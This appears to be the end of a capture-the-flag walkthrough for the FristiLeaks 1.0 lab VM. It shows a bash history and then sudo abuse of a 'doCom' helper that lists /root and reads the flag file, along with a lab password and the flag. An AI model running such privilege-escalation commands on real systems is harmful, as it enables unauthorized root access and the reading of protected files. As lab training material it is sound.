sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

Let’s go rooting now!

bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom 'ls -al /root'
[sudo] password for fristigod: LetThereBeFristi!

total 48
dr-xr-x---.  3 root root 4096 Nov 25 04:09 .
dr-xr-xr-x. 22 root root 4096 Dec 27 17:50 ..
-rw-------   1 root root 1936 Nov 25 06:10 .bash_history
-rw-r--r--.  1 root root   18 May 20  2009 .bash_logout
-rw-r--r--.  1 root root  176 May 20  2009 .bash_profile
-rw-r--r--.  1 root root  176 Sep 22  2004 .bashrc
drwxr-xr-x.  3 root root 4096 Nov 25 05:53 .c
-rw-r--r--.  1 root root  100 Sep 22  2004 .cshrc
-rw-------.  1 root root 1291 Nov 17 06:51 .mysql_history
-rw-r--r--.  1 root root  129 Dec  3  2004 .tcshrc
-rw-------.  1 root root  829 Nov 17 09:17 .viminfo
-rw-------.  1 root root  246 Nov 17 12:19 fristileaks_secrets.txt
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom 'cat /root/fristileaks_secrets.txt'
stileaks_secrets.txt'ristigod/.secret_admin_stuff/doCom 'cat /root/fri
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1


bash-4.1$ 

Done..

2015-12-29 17:40:24 +1100